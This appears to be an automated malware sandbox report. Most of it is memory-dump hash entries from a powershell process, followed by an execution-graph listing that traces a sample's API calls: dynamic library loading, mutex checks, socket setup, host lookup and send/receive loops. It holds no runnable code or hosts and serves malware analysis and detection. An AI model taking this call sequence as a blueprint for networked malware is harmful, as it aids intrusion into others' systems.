                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b082a8285563735991dd4b13786a148104f43ea329931f143d5a32604e02afdb
                    • Instruction ID: 4a222db728ebca57c11a9104764eb8b5e8ee891250026f3985ba3c263ca35a0c
                    • Opcode Fuzzy Hash: b082a8285563735991dd4b13786a148104f43ea329931f143d5a32604e02afdb
                    • Instruction Fuzzy Hash: 5C31D4B650031ACFCB12DF74C4446EA7BB1EB89391F55492ADB02CB700DB389E068BE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dceb3690d21ebc5cfcef508a18b989fb1ec3297cf461fe4d2d2d785463f6e829
                    • Instruction ID: 60bf966a949222077a19bf2c24abf19564118851c04bc5fe94fe50cb2bcbdda9
                    • Opcode Fuzzy Hash: dceb3690d21ebc5cfcef508a18b989fb1ec3297cf461fe4d2d2d785463f6e829
                    • Instruction Fuzzy Hash: 0731A1B660031A8FCB11DFB4C4846AA7BF1EB89391F45493AEA07D7700DB389D018BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 97828f71d8538d5bdc11ded7516d7f25a90f31d3a5bfe39b4b345fdd20520c1d
                    • Instruction ID: f1b2c564b5304d4d82bbb23b6633602726c4f7c1b9ebf57c723359719c2eef71
                    • Opcode Fuzzy Hash: 97828f71d8538d5bdc11ded7516d7f25a90f31d3a5bfe39b4b345fdd20520c1d
                    • Instruction Fuzzy Hash: B0317079B002198FDB44DF69C990AAEB7B2FFC8714F118069E909DB350DB30AD018B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e10496b90a7f7f8cee691745acca3d6df74bf53057db34bea67080a22a72c37a
                    • Instruction ID: c63455267fdd68ab85719dcf8fabe0fa3f7ef8fc3da62d6ed0a6063def7527ee
                    • Opcode Fuzzy Hash: e10496b90a7f7f8cee691745acca3d6df74bf53057db34bea67080a22a72c37a
                    • Instruction Fuzzy Hash: E42162763002205FD700EB79E8C485ABBA6FFC9665315817AEA05CB362DB32EC15C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fe7690b6c18d4be886374fe31ff12213a1b29518f206d45fc863942299065bef
                    • Instruction ID: 205a926cbb8a2a8c0b6e4e1d9a7941e099661b52bcc27920c802b415d7107819
                    • Opcode Fuzzy Hash: fe7690b6c18d4be886374fe31ff12213a1b29518f206d45fc863942299065bef
                    • Instruction Fuzzy Hash: DF31F778B012049FE715EF68C458B9EBBB6EF89314F158099E505AF3A2CB35EC81CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d1ccc676cb1b025eba712cbe480d3164d438f68cd79ab67a8901570127354bf8
                    • Instruction ID: 1216b21c39eb8a4441a856fd80cebb0485d22ecc90dcca121daa9acdbdd9aa29
                    • Opcode Fuzzy Hash: d1ccc676cb1b025eba712cbe480d3164d438f68cd79ab67a8901570127354bf8
                    • Instruction Fuzzy Hash: 6421E5B4A01205CFDB08DF64D098AAEBBB6BF49314F15859AE905AB361CB34EC81CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.711360010.0000000007CD0000.00000040.00000001.sdmp, Offset: 07CD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7cd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d19c84fef9ea4d0ce1208d0d626af54d1bbc55cfbd96c2b39bb1287555c3d52a
                    • Instruction ID: e22fd33cb1c86eb8fb8df9a09c712cbe506ea3fa297ef2a7e8d08ee00ddec5ed
                    • Opcode Fuzzy Hash: d19c84fef9ea4d0ce1208d0d626af54d1bbc55cfbd96c2b39bb1287555c3d52a
                    • Instruction Fuzzy Hash: 60012D71B052124FDB15129D64311B6B7E3CFC2D51F1540ABE686CB355DE319D8393E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cb21ae0d2e757b96bade21d92ad13b10ef9fbb447fc7f5bb0c53d9290751b8f6
                    • Instruction ID: bc3b7c577cebf7ae0045b21c09b68be69cc71e656d1f9e092f46b1fd199b63af
                    • Opcode Fuzzy Hash: cb21ae0d2e757b96bade21d92ad13b10ef9fbb447fc7f5bb0c53d9290751b8f6
                    • Instruction Fuzzy Hash: 7911C178A013159FD701DB68D8509DFB7A6EFC5210F10487AD9089B340DB34AD018BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2610a8109558a8b7685207ba4d3c04fc2b7b2f66ad7a93cfb8954ec832b12bf2
                    • Instruction ID: 50d38220b75524a0e39b5a7f147c16e1507feb1ad9b433b3d9e56f2f486e36e1
                    • Opcode Fuzzy Hash: 2610a8109558a8b7685207ba4d3c04fc2b7b2f66ad7a93cfb8954ec832b12bf2
                    • Instruction Fuzzy Hash: 4611C4392017049FD304EB28D890A9E77A3EFC5224F108EADD4854F2A1CF75BD0A8BD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 36dd19c6329b0241c155cd70251411f9f46a2a4f3f24890b6feaefd4c42e2ef5
                    • Instruction ID: e934a5a1d1fd15691da72fbd5c5c1c3c555b39584dc2ff4699ffd61e293b4d4e
                    • Opcode Fuzzy Hash: 36dd19c6329b0241c155cd70251411f9f46a2a4f3f24890b6feaefd4c42e2ef5
                    • Instruction Fuzzy Hash: A811AC392007049BD304EB28D890A9A77A3EFC5218F508E6CD4864F261CFB1BD0A8BD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0648befbbf5cd7393d39911079638e6f2494191e414b68a7aa7f596d9b42decb
                    • Instruction ID: f102e91e5262e6a4428fd475cabf6daa03cbc6a707c16ff1b31628eac53b9b3f
                    • Opcode Fuzzy Hash: 0648befbbf5cd7393d39911079638e6f2494191e414b68a7aa7f596d9b42decb
                    • Instruction Fuzzy Hash: C1018078B017159BDB10EB69D8509DFB7A6EFC5315F104879E908AF340DB34AD028BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.703582333.000000000308D000.00000040.00000001.sdmp, Offset: 0308D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_308d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 64ff25f7324ee457ee58dedff26b096cd80921b677119432a3bd825407d4558b
                    • Instruction ID: 89f6fb8d75a863cf049e2143706579cc23018e86de4b63a4053e8f21376a0466
                    • Opcode Fuzzy Hash: 64ff25f7324ee457ee58dedff26b096cd80921b677119432a3bd825407d4558b
                    • Instruction Fuzzy Hash: BB01F7705097849AE7109F15DCC4767FBC8EF41228F08865AED841B2C2C379E845CEB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.703582333.000000000308D000.00000040.00000001.sdmp, Offset: 0308D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_308d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d5283e8336dc70eb4d9ed803ef6f3e16606481eb11216af7f59d8c1adb06bce
                    • Instruction ID: 102b9151fc9b8d98721095792ca1404d40cc8037b7a510e55a32355e44981da5
                    • Opcode Fuzzy Hash: 8d5283e8336dc70eb4d9ed803ef6f3e16606481eb11216af7f59d8c1adb06bce
                    • Instruction Fuzzy Hash: AB01296140E3C09FD7128B258C94B52BFA4EF43224F0D81DBD9848F2A3C2699848CB72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.711360010.0000000007CD0000.00000040.00000001.sdmp, Offset: 07CD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7cd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ba9c9f76a7539df31332bd182d6d9c85559def4c11ead5b41a9baad3c321a1e
                    • Instruction ID: 0b5cf8f2e1bc288f702c001cd720c4fdb0e89c6464dc96d43dd939bf04422f07
                    • Opcode Fuzzy Hash: 7ba9c9f76a7539df31332bd182d6d9c85559def4c11ead5b41a9baad3c321a1e
                    • Instruction Fuzzy Hash: 8C012D71B0B3520FE312136C64711EAB7938FC2914F1980ABD5C1DF286CD669C8383E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cc569d96dec1cae8e0f1c7467cb3fd3895fc10ddeefdc5cf90ffe94064b42461
                    • Instruction ID: 90bb923d9d129ea53681913b22b9addf9354d13bc9ee5d77c9d4018ca24554a8
                    • Opcode Fuzzy Hash: cc569d96dec1cae8e0f1c7467cb3fd3895fc10ddeefdc5cf90ffe94064b42461
                    • Instruction Fuzzy Hash: A5018631204B458FD760DF29D881887BBB6EF85214314CD3EE05987621DB70AA0A8BD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 71934ab5a9015e06ac90df0827beefdf54cc9446d1558e099c8d1a3cdfcbe365
                    • Instruction ID: 4af025d3641b92a2d7a1db8fa583aa20464c0ceca0d7cd67434ba4c7acd3767c
                    • Opcode Fuzzy Hash: 71934ab5a9015e06ac90df0827beefdf54cc9446d1558e099c8d1a3cdfcbe365
                    • Instruction Fuzzy Hash: C3F0243A2043556FC3059B58DC44EBE7FBAEFC6660F24482AE505CB291CB745C0587A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1d98d7067503b5e5e4526627e633154684f10928ea2fef9b8fbb11194b0ce9a4
                    • Instruction ID: fe82fbd94f49563a2d7036d3e058d4f55acf5f0981af9482494751829ec0742e
                    • Opcode Fuzzy Hash: 1d98d7067503b5e5e4526627e633154684f10928ea2fef9b8fbb11194b0ce9a4
                    • Instruction Fuzzy Hash: 43F01D31200B099B9760DF2ED88084BB7E6EF842153108D3EE45A87621DB70B90A8BD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ac1394434ef21a163f7bab493e770a73dc16c4aec2c87ec5b964019bdee23705
                    • Instruction ID: b5a084d843e938411e73b2aa819accc20bb98628ed37356cdf09c918ee3cd7b3
                    • Opcode Fuzzy Hash: ac1394434ef21a163f7bab493e770a73dc16c4aec2c87ec5b964019bdee23705
                    • Instruction Fuzzy Hash: 25E0229DB403042BEB28A2B8083037F22C78BC4E64B04C479E40ADF781EEB08C4113E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f0581ecce37db5cc6a2ec7b473ee7235e74e28052453bbd87ddceaf96d8161d
                    • Instruction ID: 223409e22ba3c48b3aeb4ca15c4d50106d81f9de459347fdc52cbf2f475d9f1c
                    • Opcode Fuzzy Hash: 0f0581ecce37db5cc6a2ec7b473ee7235e74e28052453bbd87ddceaf96d8161d
                    • Instruction Fuzzy Hash: A0E0D8363092545F97055636BC854E7BF69EBC5570315C137ED48C7650DA21CD0683E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ee6683bef7ecf0f574d3dab01176b1aedcaa08356aac001c3f7828865f9baaa
                    • Instruction ID: 319226425ca971e7cb4c8ac65e95174b362a564205ddcae0440fc955983d5b74
                    • Opcode Fuzzy Hash: 1ee6683bef7ecf0f574d3dab01176b1aedcaa08356aac001c3f7828865f9baaa
                    • Instruction Fuzzy Hash: 20E09299B513142BEB18A6B8087077F21C78BC5E64B04C479950ADF385EEB49D4113D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e292fb3e46237a8a43bd941e7c5a25b8df80633bc703fd0248c1650a2244ac92
                    • Instruction ID: 6bab09b73879299f2f8089e115a3459cac800f06370a323e1e3f282b156c73ba
                    • Opcode Fuzzy Hash: e292fb3e46237a8a43bd941e7c5a25b8df80633bc703fd0248c1650a2244ac92
                    • Instruction Fuzzy Hash: 4EF0E5363002296FD7059B58EC45EBF77AAEBC9620B24482AF505C7380DF711C0287A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c1a9410ed2036f24b5fec9889dc40c49f9b8f77f729371051842a77c0d152fd
                    • Instruction ID: e6c79d0a89bf6b4144cde4b2105bb4039898e4fca419f5cf9a6e03df2d32b343
                    • Opcode Fuzzy Hash: 7c1a9410ed2036f24b5fec9889dc40c49f9b8f77f729371051842a77c0d152fd
                    • Instruction Fuzzy Hash: FEE04F79F01228978B14FAB8E8451DEB765DBC5A10B014169DD15D7348DE309D06C7C2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dfa0b205956a603cc91fb0f8bbda0e70448bb6eb67beec794cd6491ca11cdb81
                    • Instruction ID: 3e438c0f13ebaf92ede745fe14602d3722f3004718e27fd1cad36c438dd79ae6
                    • Opcode Fuzzy Hash: dfa0b205956a603cc91fb0f8bbda0e70448bb6eb67beec794cd6491ca11cdb81
                    • Instruction Fuzzy Hash: 85E0D8B12017108FC735DF7CE44099277A69F8221DB144DAFD0594BB60DB72F884CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 622d7245b38942fb12103f5a6c4288c5d06056681845c4c3bdeec06180933308
                    • Instruction ID: 930c7c43c0c1a25b664653330ec2042319379a6f567f5192e40527aa023832b6
                    • Opcode Fuzzy Hash: 622d7245b38942fb12103f5a6c4288c5d06056681845c4c3bdeec06180933308
                    • Instruction Fuzzy Hash: E1E04F79F00228978B14FAB9E8055DE73A99BC5A00B014169D905D7248DE309D05C7C2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5267cedcf65c988fccc1122de701395025762cfb223a7307546dae10a7981aa7
                    • Instruction ID: bdafb99e9d66e1433ca7cba628e7644e0007d4fa84c31457c367535375249f7c
                    • Opcode Fuzzy Hash: 5267cedcf65c988fccc1122de701395025762cfb223a7307546dae10a7981aa7
                    • Instruction Fuzzy Hash: 62D05E3D2106249FC344EB68E409E967BAAEB8C721B0141E6F90987761CF25EC008BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 24bd6d5e0649a096ba4b42e88f10f36ed2ebcf4f037f4d11db5b1031eddad705
                    • Instruction ID: 673e39c0a03296174e81b28744407bfabde7d049770eed7a206f8d6689c1121f
                    • Opcode Fuzzy Hash: 24bd6d5e0649a096ba4b42e88f10f36ed2ebcf4f037f4d11db5b1031eddad705
                    • Instruction Fuzzy Hash: 36C08C3AF02009CFCB00DB94F8848DCF771FBC8225B00C023E10183201C7319421EB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7114e66242cbe8148b28ff1fc05bdb48127cf85e2eef508f0e2a7655cfff7376
                    • Instruction ID: 7faa98981024bee2ff3316b35be5ed84e837b7384b81c1034b259db68f249d2a
                    • Opcode Fuzzy Hash: 7114e66242cbe8148b28ff1fc05bdb48127cf85e2eef508f0e2a7655cfff7376
                    • Instruction Fuzzy Hash: F7725A78A002188FDB54EB64C860BEE77B2EFC5704F1094E9D149AB791DF35AE828F51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b3da7deb2043b21c609f21d543bf04eebfae39f8fcad7fe13b65fcbd99bd31de
                    • Instruction ID: 2a42c46892b1eca7453376075f4297331c15a99baac955ef9cf43aa096de62be
                    • Opcode Fuzzy Hash: b3da7deb2043b21c609f21d543bf04eebfae39f8fcad7fe13b65fcbd99bd31de
                    • Instruction Fuzzy Hash: B4625978A002189FDB54EB64C860BEE77B2EFC5704F1094E9D149AB790DF35AE828F51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a87780971f01692aac3a6a361b34d2b8b050f4fcf1cd292f824b0e759047c2f7
                    • Instruction ID: c826b14cef1ced63df784cf8e6a9662c93a8005f6e4fd868b4457a2a3b96a107
                    • Opcode Fuzzy Hash: a87780971f01692aac3a6a361b34d2b8b050f4fcf1cd292f824b0e759047c2f7
                    • Instruction Fuzzy Hash: 7A325EB5B012089FCB14DFA8D554A9EBBF2FF88714F24416AE505AB3A0CB75EC85CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 18d4c64375729a9ec7367f2e2e09d1239f71cdc5ce85b2d58c76fdf634241400
                    • Instruction ID: 3bb071c94ea66a25f23386ac3820ae3b74c27a88b2ce2c1ee57602710e37560a
                    • Opcode Fuzzy Hash: 18d4c64375729a9ec7367f2e2e09d1239f71cdc5ce85b2d58c76fdf634241400
                    • Instruction Fuzzy Hash: 8D322B78A003088FDB54EFA4C8607AE77B3FF84704F1095A9D149AF294DB75AE468F91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.710683076.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_74f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 41d721c5d52ad8e475dbf2cd3a288b6225facb67d151e194e39195f279475bd9
                    • Instruction ID: c2ec738b861a539eb7c73a810fe873392fe5d1fafff523b1b1e8f1f014189c00
                    • Opcode Fuzzy Hash: 41d721c5d52ad8e475dbf2cd3a288b6225facb67d151e194e39195f279475bd9
                    • Instruction Fuzzy Hash: 67220C78A007098FDB54EFA4C8607AE77B3FF84704F1095A8D149AF294DB75AE428F91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    Memory Dump Source
                    • Source File: 00000004.00000002.790742374.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_ced000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 467632f6aec50d56b3094c21310854c8d8d6cd3108dadb3d1fd8f1b842e6283d
                    • Instruction ID: 6e3557c1f265d81e75b5ab4bcb6a1365c6fac743e50f8ac1e5c2d822767a7188
                    • Opcode Fuzzy Hash: 467632f6aec50d56b3094c21310854c8d8d6cd3108dadb3d1fd8f1b842e6283d
                    • Instruction Fuzzy Hash: 09014C6140D3C09FD7128B258CA4B52BFB4AF53624F1D81DBD9958F2A3C2699849C772
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.790742374.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_ced000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 58142cfe6a7f176bdc8c5ac551b851916645b1fbc66ff0d802f95ca8ba729579
                    • Instruction ID: 80aac752a637e59b4fce4dd95c16533aa1cc6e5b7a5a32299e86d5197dc0fe19
                    • Opcode Fuzzy Hash: 58142cfe6a7f176bdc8c5ac551b851916645b1fbc66ff0d802f95ca8ba729579
                    • Instruction Fuzzy Hash: 7901F7705087C0AEEB104E27CC84763BF98EF41324F1C805AED561B242C779D946C6B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Execution Graph

                    Execution Coverage:31.6%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:11.8%
                    Total number of Nodes:380
                    Total number of Limit Nodes:8

                    Graph

                    execution_graph 912 4c234a 913 4c2363 912->913 935 4c1a2f 913->935 918 4c23cf WSAStartup 928 4c23f1 918->928 919 4c2373 964 4c3720 lstrcpyA 919->964 921 4c2386 wsprintfA CreateMutexA 922 4c23ac 921->922 924 4c1f27 5 API calls 922->924 930 4c23c7 922->930 932 4c23b3 Sleep 922->932 923 4c2494 WSACleanup CloseHandle ExitProcess 924->922 926 4c245b Sleep 954 4c2512 926->954 927 4c2433 CreateThread CloseHandle 929 4c2457 927->929 1277 4c206c 927->1277 928->923 928->926 928->927 947 4c25da 928->947 929->926 933 4c2512 5 API calls 930->933 932->922 934 4c23ce 933->934 934->918 936 4c1a46 935->936 938 4c1a4d 935->938 941 4c1f27 936->941 937 4c1a67 LoadLibraryA 937->936 937->938 938->936 938->937 940 4c1aa2 938->940 939 4c1aac GetProcAddress 939->936 939->940 940->938 940->939 965 4c3720 lstrcpyA 941->965 943 4c1f40 wsprintfA CreateMutexA 944 4c1f67 GetLastError 943->944 945 4c1f89 943->945 944->945 946 4c1f74 CloseHandle 944->946 945->918 945->919 946->945 966 4c2265 947->966 949 4c25f5 969 4c1f95 949->969 951 4c2600 953 4c2647 951->953 973 4c1234 951->973 953->928 955 4c2527 954->955 956 4c252b 955->956 1276 4c3720 lstrcpyA 955->1276 959 4c256f GetLastError 956->959 960 4c2569 956->960 958 4c2545 wsprintfA CreateMutexA 958->956 963 4c2588 CloseHandle 959->963 961 4c256c 960->961 962 4c2594 960->962 961->963 962->928 963->962 964->921 965->943 1008 4c3720 lstrcpyA 966->1008 968 4c2282 968->949 970 4c1fa7 969->970 1009 4c3720 lstrcpyA 970->1009 972 4c205d lstrcatA 972->951 1010 4c1000 gethostbyname 973->1010 975 4c124e 976 4c1256 975->976 1017 4c1d41 LocalAlloc 975->1017 976->951 978 4c1269 1018 4c1095 978->1018 980 4c127a 981 4c147a closesocket 980->981 982 4c1285 lstrlenA lstrlenA send 980->982 983 4c1481 981->983 984 4c12aa select 982->984 1003 4c1346 982->1003 1081 4c1d2d 983->1081 984->981 986 4c12e7 recv 984->986 987 4c12fd 986->987 989 4c134b 986->989 988 4c1312 select 987->988 987->989 988->986 988->1003 990 4c13de 989->990 993 4c13a4 989->993 989->1003 1029 4c3720 lstrcpyA 990->1029 992 4c13f0 StrStrA 1006 4c13fe 992->1006 996 4c13b1 993->996 993->1003 994 4c145e 1030 4c343f 994->1030 995 4c143f 998 4c1452 995->998 999 4c1443 995->999 1035 4c148f 996->1035 